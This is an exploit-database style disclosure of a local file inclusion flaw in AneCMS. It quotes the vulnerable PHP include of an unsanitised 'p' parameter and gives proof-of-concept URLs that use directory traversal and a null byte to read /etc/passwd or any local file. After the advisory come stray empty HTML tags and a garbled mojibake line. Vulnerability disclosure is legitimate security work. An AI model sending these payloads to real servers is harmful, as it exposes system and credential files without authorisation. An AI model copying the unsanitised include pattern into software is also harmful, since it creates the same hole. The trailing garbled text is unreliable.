# Exploit Title: AneCMS v.2e2c583 LFI exploit # Date: 03.04.2012# Author: I2sec-PJH # Software Link: https://github.com/AneGroup/AneCMS # Version: v.2e2c583 ----------------------------------------------------- -Description vulnerabilities have been discovered in the index page. -source of index.php 1. if (isset ($ _GET ['p']))2. include '. / pages /'. $ _GET ['p']. '. php'; -PoC http://localhost/index.php?p=../../../../etc/passwd%00 http://localhost/index.php?p=../../../../[localfile]%00
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß